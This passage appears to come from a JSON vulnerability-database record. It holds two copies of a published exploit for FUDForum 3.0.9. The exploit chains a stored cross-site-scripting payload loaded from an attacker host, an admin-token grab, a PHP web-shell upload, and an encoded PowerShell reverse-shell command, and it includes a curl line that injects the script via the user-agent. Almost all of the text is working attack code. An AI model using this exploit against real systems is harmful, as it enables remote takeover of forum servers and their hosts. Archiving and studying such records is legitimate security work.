%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41\";\n \txhr = new XMLHttpRequest();\n\txhr.open(\"GET\", url, true);\n\txhr.send(null);\n\n}\n\nfunction submitFormWithTokenJS(token) {\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", '/fudforum/adm/admbrowse.php', true);\n\n // Send the proper header information along with the request\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data, boundary=-----------------------------9703186584101745941654835853\");\n\n var currentdir = \"C:/xampp/htdocs/fudforum\"; // webroot - forum directory\n var fileName = \"liquidsky.php\";\n var url = \"/fudforum/adm/admbrowse.php\";\n var ctype = \"application/x-php\";\n var fileData = \"<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>\";\n var boundary = \"-----------------------------9703186584101745941654835853\";\n var fileSize = fileData.length;\n\n var body = \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"cur\"\\r\\n\\r\\n';\n body += currentdir + \"\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"SQ\"\\r\\n\\r\\n';\n body += token + \"\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"fname\"; filename=\"' + fileName + '\"\\r\\n';\n body += \"Content-Type: \" + ctype + \"\\r\\n\\r\\n\";\n body += fileData + \"\\r\\n\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"tmp_f_val\"\\r\\n\\r\\n';\n body += \"1\" + \"\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"d_name\"\\r\\n\\r\\n';\n body += fileName + \"\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"file_upload\"\\r\\n\\r\\n';\n body += \"Upload File\" + '\\r\\n';\n body += \"--\" + boundary + \"--\";\n\n xhr.send(body);\n}\n\n//Grab SQ token\nvar req = new XMLHttpRequest();\n\nreq.onreadystatechange=function()\n{\n if (req.readyState == 4 && req.status == 200) {\n var htmlPage = req.responseXML; /* fetch html */\n var SQ = htmlPage.getElementsByTagName(\"input\")[0]\n submitFormWithTokenJS(SQ.value);\n }\n}\n\nreq.open(\"GET\", \"/fudforum/adm/admuser.php\", true);\nreq.responseType = \"document\";\nreq.send();\n\npatience();", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-11-14T02:21:28", "description": "", "published": "2019-11-12T00:00:00", "type": "packetstorm", "title": "FUDForum 3.0.9 Code Execution / Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18873", "CVE-2019-18839"], "modified": "2019-11-12T00:00:00", "id": "PACKETSTORM:155261", "href": "https://packetstormsecurity.com/files/155261/FUDForum-3.0.9-Code-Execution-Cross-Site-Scripting.html", "sourceData": "`// Exploit Title : FUDForum 3.0.9 - Stored XSS / Remote Code Execution \n// Date : 10/26/19 \n// Exploit Author : liquidsky (JMcPeters) \n// Vulnerable Software : FUDForum 3.0.9 \n// Vendor Homepage : https://sourceforge.net/projects/fudforum/ \n// Version : 3.0.9 \n// Software Link : https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download \n// Tested On : Windows / mysql / apache \n// Author Site : https://github.com/fuzzlove/FUDforum-XSS-RCE \n// Demo : https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks \n// CVE : CVE-2019-18839, CVE-2019-18873 \n// \n// Greetz : wetw0rk, Fr13ndz, offsec =) \n// \n// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution. \n// The areas impacted are the admin panel and the forum. \n// \n// XSS via username in Forum: \n// 1. Register an account and log in to the forum. \n// 2. Go to the user control panel. -> Account Settings -> change login \n// 3. Insert javascript payload <script/src=\"http://attacker.machine/fud.js\"></script> \n// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system. \n// \n// XSS via user-agent in Admin Panel: \n// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity. \n// 2. Send the XSS payload below (from an IP associated with an account) / host the script: \n// 3. curl -A '<script src=\"http://attacker.machine/fud.js\"></script>' http://target.machine/fudforum/index.php \n// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under \"Recent sessions\", uploading a php shell on the remote system. \n// \n \nfunction patience() \n{ \nvar u=setTimeout(\"grabShell()\",5000); \n} \n \n// This function is to call the reverse shell php script (liquidsky.php). \n// currently using a powershell payload that will need to be modified. \nfunction grabShell() \n{ \nvar url =\"/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41\"; \nxhr = new XMLHttpRequest(); \nxhr.open(\"GET\", url, true); \nxhr.send(null); \n \n} \n \nfunction submitFormWithTokenJS(token) { \nvar xhr = new XMLHttpRequest(); \nxhr.open(\"POST\", '/fudforum/adm/admbrowse.php', true); \n \n// Send the proper header information along with the request \nxhr.setRequestHeader(\"Content-Type\", \"multipart/form-data, boundary=-----------------------------9703186584101745941654835853\"); \n \nvar currentdir = \"C:/xampp/htdocs/fudforum\"; // webroot - forum directory \nvar fileName = \"liquidsky.php\"; \nvar url = \"/fudforum/adm/admbrowse.php\"; \nvar ctype = \"application/x-php\"; \nvar fileData = \"<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>\"; \nvar boundary = \"-----------------------------9703186584101745941654835853\"; \nvar fileSize = fileData.length; \n \nvar body = \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"cur\"\\r\\n\\r\\n'; \nbody += currentdir + \"\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"SQ\"\\r\\n\\r\\n'; \nbody += token + \"\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"fname\"; filename=\"' + fileName + '\"\\r\\n'; \nbody += \"Content-Type: \" + ctype + \"\\r\\n\\r\\n\"; \nbody += fileData + \"\\r\\n\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"tmp_f_val\"\\r\\n\\r\\n'; \nbody += \"1\" + \"\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"d_name\"\\r\\n\\r\\n'; \nbody += fileName + \"\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"file_upload\"\\r\\n\\r\\n'; \nbody += \"Upload File\" + '\\r\\n'; \nbody += \"--\" + boundary + \"--\"; \n \nxhr.send(body); \n} \n \n//Grab SQ token \nvar req = new XMLHttpRequest(); \n \nreq.onreadystatechange=function() \n{ \nif (req.readyState == 4 && req.status == 200) { \nvar htmlPage = req.responseXML; /* fetch html */ \nvar SQ = htmlPage.getElementsByTagName(\"input\")[0] \nsubmitFormWithTokenJS(SQ.value); \n} \n} \n \nreq.open(\"GET\", \"/fudforum/adm/admuser.php\", true); \nreq.responseType = \"document\"; \nreq.send(); \n \npatience(); \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155261/fudforum309-xssexec.txt"}]}